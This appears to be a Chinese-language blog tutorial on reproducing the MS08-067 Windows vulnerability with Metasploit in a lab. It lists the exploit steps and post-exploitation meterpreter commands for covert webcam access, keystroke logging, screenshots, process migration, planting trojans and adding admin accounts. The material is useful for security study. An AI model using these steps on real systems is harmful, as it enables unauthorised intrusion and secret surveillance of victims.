Metasploit工具漏洞利用MS08-067

MS08-067漏洞复现

  • 收集靶机信息
  • 开始渗透
  • 后渗透命令
    • 相关命令

收集靶机信息

通过Nmap和Nessus收集靶机的IP,Nessus扫描是否存在漏洞
Metasploit工具漏洞利用MS08-067_第1张图片

开始渗透

  1. 进入metasploit工具/普通终端输入msfconsle进入
  2. 测试渗透主机kali到靶机的连通性(ping)
  3. 找到kali后台针对ms08-067的漏洞利用(exploit)

search ms08-067

  1. 利用漏洞

use 路径

Metasploit工具漏洞利用MS08-067_第2张图片

  1. 查看利用漏洞需要配置的参数:show optionsMetasploit工具漏洞利用MS08-067_第3张图片
  2. 设置必要参数:lhost本机IP,rhost目标靶机IP,lport本机端口

set lhost/rhost/lport/rport

  1. 执行exploit获取用户的控制权限,拿到shell,也可使用run。
    Metasploit工具漏洞利用MS08-067_第4张图片

后渗透命令

  • 获取shell之后,就是后渗透阶段了,可以查看靶子机电脑信息,复制他的文件,上传木马,也可以创建管理员账户,或者是开启端口3389(开启远程桌面)
  • 或者可以侦听键盘,监视桌面,偷偷开启摄像头等

相关命令

  • 开启摄像头:webcam_stream
  • 查看进程号:tasklist
  • 切换进程:migrate + 进程号
  • 开启键盘记录:keyscan_start
  • 显示键盘记录:keyscan_dump
  • 屏幕截图:use espia
  • 查看截图:screengrab
    还有很多后渗透命令,所以说,网络安全与生活息息相关,在透明的互联网上网络安全非常重要

所有知识为个人总结向,仅供参考

你可能感兴趣的:(主机渗透)